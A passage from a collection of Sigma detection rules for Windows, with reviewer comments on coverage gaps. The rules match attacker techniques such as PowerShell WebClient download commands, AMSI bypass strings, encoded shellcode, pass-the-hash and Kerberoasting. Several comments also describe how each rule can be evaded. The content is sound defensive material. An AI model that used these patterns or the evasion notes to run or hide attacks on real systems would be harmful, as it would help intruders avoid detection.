6 | - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
7 | author: Florian Roth
8 | date: 2019/01/10
9 | tags:
10 | - attack.defense_evasion
11 | - attack.privilege_escalation
12 | - attack.t1055
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection1:
18 | CommandLine: '*\svchost.exe C:\Users\\*\Desktop\\*'
19 | selection2:
20 | ParentImage: '*\svchost.exe*'
21 | CommandLine:
22 | - '*whoami.exe /all'
23 | - '*net.exe view'
24 | condition: 1 of them
25 | falsepositives:
26 | - Unlikely
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mavinject_proc_inj.yml:
--------------------------------------------------------------------------------
1 | title: MavInject Process Injection
2 | id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
3 | status: experimental
4 | description: Detects process injection using the signed Windows tool Mavinject32.exe
5 | references:
6 | - https://twitter.com/gN3mes1s/status/941315826107510784
7 | - https://reaqta.com/2017/12/mavinject-microsoft-injector/
8 | - https://twitter.com/Hexacorn/status/776122138063409152
9 | author: Florian Roth
10 | date: 2018/12/12
11 | tags:
12 | - attack.t1055
13 | - attack.t1218
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine: '* /INJECTRUNNING *'
20 | condition: selection
21 | falsepositives:
22 | - unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mmc_spawn_shell.yml:
--------------------------------------------------------------------------------
1 | title: MMC Spawning Windows Shell
2 | id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
3 | status: experimental
4 | description: Detects a Windows command line executable started from MMC.
5 | author: Karneades, Swisscom CSIRT
6 | tags:
7 | - attack.lateral_movement
8 | - attack.t1175  # legacy ATT&CK id for Distributed Component Object Model; the lateral-movement path this targets is presumably a remote MMC20.Application launch -- the rule itself only sees the parent/child pair, so ParentCommandLine (listed under fields) is what separates that from an interactive snap-in
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | ParentImage: '*\mmc.exe'  # any mmc.exe regardless of path or which console (.msc) is loaded
15 | Image:
16 | - '*\cmd.exe'
17 | - '*\powershell.exe'
18 | - '*\wscript.exe'
19 | - '*\cscript.exe'
20 | - '*\sh.exe'
21 | - '*\bash.exe'
22 | - '*\reg.exe'
23 | - '*\regsvr32.exe'
24 | - '*\BITSADMIN*'  # only entry with a trailing wildcard and upper case; matches bitsadmin.exe plus anything after it -- harmless, but inconsistent with the exact-suffix entries above. Case handling is backend-dependent
25 | condition: selection
26 | fields:
27 | - CommandLine
28 | - Image
29 | - ParentCommandLine
30 | level: high  # no falsepositives section and no date: list the expected benign sources (e.g. admin tooling started from custom consoles) before tuning -- TODO confirm in your environment
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_fw_add.yml:
--------------------------------------------------------------------------------
1 | title: Netsh  # too generic for an alert list; the description below carries the actual meaning
2 | id: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c
3 | description: Allow Incoming Connections by Port or Application on Windows Firewall
4 | references:
5 | - https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)
6 | - https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
7 | date: 2019/01/29
8 | tags:
9 | - attack.lateral_movement
10 | - attack.command_and_control
11 | - attack.t1090  # NOTE(review): t1090 is Connection Proxy; opening an inbound firewall port is closer to defense evasion (impairing defenses) -- confirm against the ATT&CK version this corpus maps to
12 | status: experimental
13 | author: Markus Neis
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine:
20 | - '*netsh firewall add*'  # matches the legacy 'netsh firewall' context only. The current form 'netsh advfirewall firewall add rule' contains no 'netsh firewall add' substring and is NOT matched -- extend the list if that syntax is in scope
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administration
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_packet_capture.yml:
--------------------------------------------------------------------------------
1 | title: Capture a Network Trace with netsh.exe
2 | id: d3c3861d-c504-4c77-ba55-224ba82d0118
3 | status: experimental
4 | description: Detects capture a network trace via netsh.exe trace functionality
5 | references:
6 | - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/
7 | author: Kutepov Anton, oscd.community
8 | date: 2019/10/24
9 | tags:
10 | - attack.discovery
11 | - attack.t1040
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine|contains|all:  # all three tokens must appear somewhere in the command line, in any order; there is no Image constraint, so any process whose arguments happen to contain them matches
18 | - netsh
19 | - trace
20 | - start  # 'trace' and 'start' are ordinary words -- expect some benign noise. 'netsh trace start' also fires without 'capture=yes', i.e. for trace sessions that record no packets
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_port_fwd.yml:
--------------------------------------------------------------------------------
1 | title: Netsh Port Forwarding
2 | id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614
3 | description: Detects netsh commands that configure a port forwarding
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/29
7 | tags:
8 | - attack.lateral_movement
9 | - attack.command_and_control
10 | - attack.t1090
11 | status: experimental
12 | author: Florian Roth
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - netsh interface portproxy add v4tov4 *  # only a trailing wildcard: the match is anchored at the start of the command line, so it fires only when it begins with exactly 'netsh interface portproxy add v4tov4'. Full-path or 'netsh.exe' invocations, abbreviated verbs ('netsh i p a ...') and the v4tov6/v6tov4/v6tov6 variants are not matched -- compare the looser pattern in win_netsh_port_fwd_3389
20 | condition: selection
21 | falsepositives:
22 | - Legitimate administration
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_port_fwd_3389.yml:
--------------------------------------------------------------------------------
1 | title: Netsh RDP Port Forwarding
2 | id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
3 | description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/29
7 | tags:
8 | - attack.lateral_movement
9 | - attack.t1021
10 | - car.2013-07-002
11 | status: experimental
12 | author: Florian Roth
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - netsh i* p*=3389 c*  # wildcard form 'netsh i<...> p<...>=3389 c<...>': tolerates abbreviated verbs and covers both listenport=3389 and connectport=3389, but is still anchored at 'netsh i' -- full-path or 'netsh.exe' invocations are not matched
20 | condition: selection
21 | falsepositives:
22 | - Legitimate administration
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_overpass_the_hash.yml:
--------------------------------------------------------------------------------
1 | title: Successful Overpass the Hash Attempt
2 | id: 192a0330-c20b-4356-90b6-7b7049ae0b87
3 | status: experimental
4 | description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.
5 | references:
6 | - https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html
7 | author: Roberto Rodriguez (source), Dominik Schaudel (rule)
8 | date: 2018/02/12
9 | tags:
10 | - attack.lateral_movement
11 | - attack.t1075  # legacy (pre-v7) ATT&CK id for Pass the Hash -- remap when the tag set is upgraded
12 | - attack.s0002
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 9  # NewCredentials: the caller keeps its own token locally and uses the supplied credentials only for outbound connections
20 | LogonProcessName: seclogo  # seclogo + Negotiate is exactly what 'runas /netonly' produces as well (see falsepositives); the 4624 fields alone cannot separate the two -- correlate on the parent process and on the 4768/4769 tickets issued for the new TargetLogonId -- TODO confirm against your telemetry
21 | AuthenticationPackageName: Negotiate
22 | condition: selection
23 | falsepositives:
24 | - Runas command-line tool using /netonly parameter
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_amsi_bypass.yml:
--------------------------------------------------------------------------------
1 | title: Powershell AMSI Bypass via .NET Reflection
2 | id: 30edb182-aa75-42c0-b0a9-e998bb29067c
3 | status: experimental
4 | description: Detects Request to amsiInitFailed that can be used to disable AMSI Scanning
5 | references:
6 | - https://twitter.com/mattifestation/status/735261176745988096
7 | - https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120
8 | tags:
9 | - attack.execution
10 | - attack.defense_evasion
11 | - attack.t1086
12 | author: Markus Neis
13 | date: 2018/08/17
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection1:
19 | CommandLine:  # command-line telemetry only: the same bypass inside a script file, an -EncodedCommand blob or a downloaded second stage never shows these strings here -- pair with Script Block Logging (EID 4104)
20 | - '*System.Management.Automation.AmsiUtils*'
21 | selection2:
22 | CommandLine:
23 | - '*amsiInitFailed*'  # both literal substrings are required (condition below); trivial obfuscation such as splitting/concatenating 'amsiInitFailed' defeats the match
24 | condition: selection1 and selection2
25 | falsepositives:
26 | - Potential Admin Activity
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_b64_shellcode.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Base64 Encoded Shellcode
2 | id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8
3 | description: Detects Base64 encoded Shellcode
4 | status: experimental
5 | references:
6 | - https://twitter.com/cyb3rops/status/1063072865992523776
7 | author: Florian Roth
8 | date: 2018/11/17
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036  # NOTE(review): Masquerading is a loose fit for an encoded shellcode stager; Obfuscated Files or Information (t1027) seems closer -- confirm
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | CommandLine: '*AAAAYInlM*'  # every selection2 value contains this substring, so selection1 is implied by selection2 and the condition reduces to selection2 alone
18 | selection2:
19 | CommandLine:
20 | - '*OiCAAAAYInlM*'
21 | - '*OiJAAAAYInlM*'  # Base64 of a fixed shellcode prologue at one byte alignment; the same bytes encoded at a different offset produce a different string and are not matched -- presumably why several variants are listed
22 | condition: selection1 and selection2
23 | falsepositives:
24 | - Unknown
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_dll_execution.yml:
--------------------------------------------------------------------------------
1 | title: Detection of PowerShell Execution via DLL
2 | id: 6812a10b-60ea-420c-832f-dfcc33b646ba
3 | status: experimental
4 | description: Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll
5 | references:
6 | - https://github.com/p3nt4/PowerShdll/blob/master/README.md
7 | tags:
8 | - attack.execution
9 | - attack.t1086
10 | - car.2014-04-003
11 | author: Markus Neis
12 | date: 2018/08/25
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection1:
18 | Image:
19 | - '*\rundll32.exe'
20 | selection2:
21 | Description:
22 | - '*Windows-Hostprozess (Rundll32)*'  # German-locale file description of rundll32.exe; on an English system the Description is 'Windows host process (Rundll32)', so selection2 only adds coverage on German installs -- selection1 (Image) carries the detection elsewhere
23 | selection3:
24 | CommandLine:
25 | - '*Default.GetString*'
26 | - '*FromBase64String*'  # generic .NET decode calls; together with rundll32 this is specific, but a PowerShdll invocation that passes plain (non-Base64) script text is not matched -- TODO confirm the intended scope
27 | condition: (selection1 or selection2) and selection3
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_download.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Download from URL
2 | id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
3 | status: experimental
4 | description: Detects a Powershell process that contains download commands in its command line string
5 | author: Florian Roth
6 | tags:
7 | - attack.t1086
8 | - attack.execution
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image: '*\powershell.exe'  # PowerShell 7 (pwsh.exe) is excluded by this suffix
15 | CommandLine:
16 | - '*new-object system.net.webclient).downloadstring(*'
17 | - '*new-object system.net.webclient).downloadfile(*'
18 | - '*new-object net.webclient).downloadstring(*'
19 | - '*new-object net.webclient).downloadfile(*'  # only the inline '(New-Object ...WebClient).DownloadString(/DownloadFile(' idiom: assigning the client to a variable first, DownloadData, Invoke-WebRequest/iwr/curl aliases and Start-BitsTransfer are not matched. The lower-case patterns rely on the backend matching case-insensitively
20 | condition: selection
21 | fields:
22 | - CommandLine
23 | - ParentCommandLine
24 | falsepositives:
25 | - unknown
26 | level: medium
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_xor_commandline.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious XOR Encoded PowerShell Command Line
2 | id: bb780e0c-16cf-4383-8383-1e5471db6cf9
3 | description: Detects a suspicious PowerShell process whose command line includes the -bxor operator, an alternative obfuscation method to Base64-encoded commands.
4 | status: experimental
5 | author: Sami Ruohonen
6 | date: 2018/09/05
7 | tags:
8 | - attack.execution
9 | - attack.t1086
10 | detection:
11 | selection:
12 | CommandLine:
13 | - '* -bxor*'  # no Image constraint: any process whose command line contains ' -bxor' fires, not only powershell.exe. A -bxor inside a script file or an -EncodedCommand blob is not visible here -- pair with Script Block Logging
14 | condition: selection
15 | falsepositives:
16 | - unknown
17 | level: medium
18 | logsource:  # placed after detection/level; valid YAML, just unusual ordering compared with the other rules
19 | category: process_creation
20 | product: windows
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_process_creation_bitsadmin_download.yml:
--------------------------------------------------------------------------------
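1 | title: Bitsadmin Download
2 | id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
3 | status: experimental
4 | description: Detects usage of bitsadmin downloading a file
5 | references:
6 | - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
7 | - https://isc.sans.edu/diary/22264
8 | tags:
9 | - attack.defense_evasion
10 | - attack.persistence
11 | - attack.t1197
12 | - attack.s0190
13 | author: Michael Haag
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | Image:
20 | - '*\bitsadmin.exe'
21 | CommandLine|contains:  # was a bare 'CommandLine: - /transfer', which Sigma treats as an exact match on the whole command line and so could never fire (a real invocation is 'bitsadmin /transfer <job> <url> <path>'); |contains is what the other rules in this corpus use for switch matching
22 | - '/transfer'
23 | condition: selection
24 | fields:
25 | - CommandLine
26 | - ParentCommandLine
27 | falsepositives:
28 | - Some legitimate apps use this, but limited.  # note that /addfile + /resume achieves the same download without '/transfer' and is not covered -- TODO decide whether to add it
29 | level: medium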
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_psexesvc_start.yml:
--------------------------------------------------------------------------------
1 | title: PsExec Service Start
2 | id: 3ede524d-21cc-472d-a3ce-d21b568d8db7
3 | description: Detects a PsExec service start
4 | author: Florian Roth
5 | date: 2018/03/13
6 | modified: 2012/12/11  # NOTE(review): 'modified' precedes 'date' -- almost certainly a typo; confirm the intended year
7 | tags:
8 | - attack.execution
9 | - attack.t1035
10 | - attack.s0029
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | ProcessCommandLine: C:\Windows\PSEXESVC.exe  # exact match (no wildcard) on the command line the SCM uses to start the dropped service binary. Two caveats: (1) 'ProcessCommandLine' is the raw Security 4688 field name while every other process_creation rule here uses the generic 'CommandLine' -- check your field mapping or this never matches on Sysmon-sourced data; (2) PsExec's -r option sets a custom service name, which presumably changes this path and sidesteps the rule -- TODO confirm
17 | condition: selection
18 | falsepositives:
19 | - Administrative activity
20 | level: low
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rare_schtask_creation.yml:
--------------------------------------------------------------------------------
1 | title: Rare Scheduled Task Creations
2 | id: b20f6158-9438-41be-83da-a5a16ac90c2b
3 | status: experimental
4 | description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count
5 | function selects tasks with rare names.
6 | tags:
7 | - attack.persistence
8 | - attack.t1053
9 | - attack.s0111
10 | author: Florian Roth
11 | logsource:
12 | product: windows
13 | service: taskscheduler
14 | detection:
15 | selection:
16 | EventID: 106  # task registered, from the TaskScheduler operational log -- confirm that log channel is actually enabled and forwarded, it is not on everywhere
17 | timeframe: 7d
18 | condition: selection | count() by TaskName < 5  # aggregation: task names seen on fewer than 5 events within the 7d window are reported. Backend support for count()/by varies; a one-off admin task on a single host is reported too, hence level low. An attacker reusing a common task name would not look rare
19 | falsepositives:
20 | - Software installation
21 | level: low
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rare_service_installs.yml:
--------------------------------------------------------------------------------
1 | title: Rare Service Installs
2 | id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae
3 | description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious
4 | services
5 | status: experimental
6 | author: Florian Roth
7 | tags:
8 | - attack.persistence
9 | - attack.privilege_escalation
10 | - attack.t1050
11 | - car.2013-09-005
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 7045  # 'A service was installed in the system' (Service Control Manager, System log)
18 | timeframe: 7d
19 | condition: selection | count() by ServiceFileName < 5  # same rare-value logic as win_rare_schtask_creation, keyed on the binary path. A malicious service that reuses a common path (e.g. a renamed copy under a well-known name) does not look rare -- TODO consider a second aggregation keyed on ServiceName
20 | falsepositives:
21 | - Software installation
22 | - Software updates
23 | level: low
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_bluekeep_poc_scanner.yml:
--------------------------------------------------------------------------------
1 | title: Scanner PoC for CVE-2019-0708 RDP RCE vuln
2 | id: 8400629e-79a9-4737-b387-5db940ab2367
3 | description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
4 | references:
5 | - https://twitter.com/AdamTheAnalyst/status/1134394070045003776
6 | - https://github.com/zerosum0x0/CVE-2019-0708
7 | tags:
8 | - attack.lateral_movement
9 | - attack.t1210
10 | - car.2013-07-002
11 | author: Florian Roth (rule), Adam Bradbury (idea)
12 | date: 2019/06/02
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4625
19 | AccountName: AAAAAAA  # the hard-coded username the stock PoC sends; trivial to change in the tool, so this is a signature for the unmodified build only. Depending on your mapping the 4625 field may be TargetUserName -- confirm
20 | condition: selection
21 | falsepositives:
22 | - Unlikely
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_localhost_login.yml:
--------------------------------------------------------------------------------
1 | title: RDP Login from localhost
2 | id: 51e33403-2a37-4d66-a574-1fda1782cc31
3 | description: RDP login with localhost source address may be a tunnelled login
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/28
7 | modified: 2019/01/29
8 | tags:
9 | - attack.lateral_movement
10 | - attack.t1076  # legacy ATT&CK id for Remote Desktop Protocol -- remap when the tag set is upgraded
11 | - car.2013-07-002
12 | status: experimental
13 | author: Thomas Patzke
14 | logsource:
15 | product: windows
16 | service: security
17 | detection:
18 | selection:
19 | EventID: 4624
20 | LogonType: 10  # RemoteInteractive (RDP)
21 | SourceNetworkAddress:  # NOTE(review): the raw 4624 field is IpAddress; this name has to be mapped in the backend config or the rule never matches
22 | - "::1"
23 | - "127.0.0.1"  # only the two literal loopback addresses; the rest of 127/8 is not covered, whereas win_rdp_reverse_tunnel uses '127.*' for the same purpose -- align the two
24 | condition: selection
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_potential_cve-2019-0708.yml:
--------------------------------------------------------------------------------
1 | title: Potential RDP exploit CVE-2019-0708
2 | id: aaa5b30d-f418-420b-83a0-299cb6024885
3 | description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
4 | references:
5 | - https://github.com/zerosum0x0/CVE-2019-0708
6 | - https://github.com/Ekultek/BlueKeep
7 | tags:
8 | - attack.initial_access
9 | - attack.lateral_movement
10 | - attack.t1210
11 | - attack.t1190
12 | - car.2013-07-002
13 | status: experimental
14 | author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)"
15 | logsource:
16 | product: windows
17 | service: system
18 | detection:
19 | selection:
20 | EventID:
21 | - 56
22 | - 50
23 | Source: TermDD  # errors from the RDP terminal driver. The listed FP (dropped connections) is frequent on busy RDP hosts, so treat this as a hunting pivot rather than a standalone alert despite level: high -- TODO confirm volume in your environment
24 | condition: selection
25 | falsepositives:
26 | - Bad connections or network interruptions
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_reverse_tunnel.yml:
--------------------------------------------------------------------------------
1 | title: RDP over Reverse SSH Tunnel WFP
2 | id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41
3 | status: experimental
4 | description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
5 | references:
6 | - https://twitter.com/SBousseaden/status/1096148422984384514
7 | author: Samir Bousseaden
8 | date: 2019/02/16
9 | tags:
10 | - attack.defense_evasion
11 | - attack.command_and_control
12 | - attack.t1076
13 | - car.2013-07-002
14 | logsource:
15 | product: windows
16 | service: security
17 | detection:
18 | selection:
19 | EventID: 5156  # 'WFP permitted a connection' -- needs 'Audit Filtering Platform Connection' success auditing, which is off by default and very high volume; pre-filter on port 3389 at collection time where possible
20 | sourceRDP:
21 | SourcePort: 3389
22 | DestinationAddress:
23 | - '127.*'
24 | - '::1'
25 | destinationRDP:
26 | DestinationPort: 3389
27 | SourceAddress:
28 | - '127.*'
29 | - '::1'
30 | condition: selection and ( sourceRDP or destinationRDP )  # either direction of a loopback <-> 3389 flow. The description names svchost/termsvcs, but no Application/ProcessId field is constrained, so any process on the loopback 3389 pair matches
31 | falsepositives:
32 | - unknown
33 | level: high
34 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_sdbinst_shim_persistence.yml:
--------------------------------------------------------------------------------
1 | title: Possible Shim Database Persistence via sdbinst.exe
2 | id: 517490a7-115a-48c6-8862-1a481504d5a8
3 | status: experimental
4 | description: Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.
5 | references:
6 | - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
7 | tags:
8 | - attack.persistence
9 | - attack.t1138
10 | author: Markus Neis
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | Image:
17 | - '*\sdbinst.exe'
18 | CommandLine:
19 | - '*.sdb*'  # any command line naming an .sdb file, which presumably includes uninstall runs as well as installs. Application installers that ship a compatibility shim are an expected benign source -- falsepositives is 'Unknown' at level high, revisit after a baseline
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_service_execution.yml:
--------------------------------------------------------------------------------
1 | title: Service Execution
2 | id: 2a072a96-a086-49fa-bcb5-15cc5a619093
3 | status: experimental
4 | description: Detects manual service execution (start) via system utilities
5 | author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
6 | date: 2019/10/21
7 | modified: 2019/11/04
8 | references:
9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image|endswith:  # net.exe / net1.exe only: 'sc.exe start <svc>' and PowerShell Start-Service are other 'system utilities' the title implies but does not cover
16 | - '\net.exe'
17 | - '\net1.exe'
18 | CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression
19 | condition: selection
20 | falsepositives:
21 | - Legitimate administrator or user executes a service for legitimate reason
22 | level: low
23 | tags:  # placed after level; valid, just unusual ordering compared with the other rules
24 | - attack.execution
25 | - attack.t1035
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_spn_enum.yml:
--------------------------------------------------------------------------------
1 | title: Possible SPN Enumeration
2 | id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
3 | description: Detects Service Principal Name Enumeration used for Kerberoasting
4 | status: experimental
5 | references:
6 | - https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation
7 | author: Markus Neis, keepwatch
8 | date: 2018/11/14
9 | tags:
10 | - attack.credential_access
11 | - attack.t1208
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection_image:
17 | Image: '*\setspn.exe'
18 | selection_desc:
19 | Description: '*Query or reset the computer* SPN attribute*'  # the binary's file description (needs a source that reports it, e.g. Sysmon); presumably here so a renamed setspn.exe is still caught
20 | cmd:
21 | CommandLine: '*-q*'  # loose substring ('-q' also sits inside -query etc.), acceptable given the setspn anchor; the typical Kerberoast enumeration is 'setspn -T <domain> -Q */*' -- whether '-Q' matches '-q' is backend-dependent. LDAP/PowerShell-based SPN enumeration (Get-ADUser, Rubeus) is out of scope for this rule
22 | condition: (selection_image or selection_desc) and cmd
23 | falsepositives:
24 | - Administrator Activity
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_add_sid_history.yml:
--------------------------------------------------------------------------------
1 | title: Addition of SID History to Active Directory Object
2 | id: 2632954e-db1c-49cb-9936-67d1ef1d17d2
3 | status: stable
4 | description: An attacker can use the SID history attribute to gain additional privileges.
5 | references:
6 | - https://adsecurity.org/?p=1772
7 | author: Thomas Patzke, @atc_project (improvements)
8 | tags:
9 | - attack.persistence
10 | - attack.privilege_escalation
11 | - attack.t1178
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection1:
17 | EventID:
18 | - 4765  # SID History was added to an account
19 | - 4766  # an attempt to add SID History failed -- both need 'Audit User Account Management' enabled on the DCs
20 | selection2:
21 | EventID: 4738  # 'user account was changed' fires on any attribute change; the filter below narrows it to changes that carry a SidHistory value
22 | selection3:
23 | SidHistory:
24 | - '-'
25 | - '%%1793'  # resource-string placeholder Windows emits for an unset attribute; some collectors resolve it to text before indexing -- confirm what your pipeline stores
26 | condition: selection1 or (selection2 and not selection3)
27 | falsepositives:
28 | - Migration of an account into a new domain
29 | level: medium
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_backup_delete.yml:
--------------------------------------------------------------------------------
1 | title: Backup Catalog Deleted
2 | id: 9703792d-fd9a-456d-a672-ff92efe4806a
3 | status: experimental
4 | description: Detects backup catalog deletions
5 | references:
6 | - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx
7 | - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
8 | author: Florian Roth (rule), Tom U. @c_APT_ure (collection)
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1107  # legacy ATT&CK id for File Deletion -- remap when the tag set is upgraded
12 | logsource:
13 | product: windows
14 | service: application
15 | detection:
16 | selection:
17 | EventID: 524
18 | Source: Backup  # the Windows Backup source logs this once the catalog is gone (presumably the 'wbadmin delete catalog' path per the first reference); a process_creation rule on the wbadmin/vssadmin command line would fire earlier, this one confirms the outcome
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: medium
23 |
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_bcdedit.yml:
--------------------------------------------------------------------------------
1 | title: Possible Ransomware or unauthorized MBR modifications
2 | id: c9fbe8e9-119d-40a6-9b59-dd58a5d84429
3 | status: experimental
4 | description: Detects, possibly, malicious unauthorized usage of bcdedit.exe
5 | references:
6 | - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set
7 | author: '@neu5ron'
8 | date: 2019/02/07
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1070
12 | - attack.persistence
13 | - attack.t1067
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | NewProcessName: '*\bcdedit.exe'  # NOTE(review): NewProcessName/ProcessCommandLine are raw Security 4688 field names; the other process_creation rules here use Image/CommandLine -- check the field mapping or this never matches on Sysmon-sourced data
20 | ProcessCommandLine:
21 | - '*delete*'  # also matches 'deletevalue', so the next entry is redundant
22 | - '*deletevalue*'
23 | - '*import*'  # the 'bcdedit /set' abuse the reference points at (typically recoveryenabled no / bootstatuspolicy ignoreallfailures) contains neither 'delete' nor 'import' and is NOT matched -- extend if ransomware-style boot tampering is the goal
24 | condition: selection
25 | level: medium  # no falsepositives section; 'delete' in routine admin use of bcdedit is common -- add one
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_bginfo.yml:
--------------------------------------------------------------------------------
1 | title: Application whitelisting bypass via bginfo
2 | id: aaf46cdc-934e-4284-b329-34aa701e3771
3 | status: experimental
4 | description: Execute VBscript code that is referenced within the *.bgi file.
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml
7 | - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
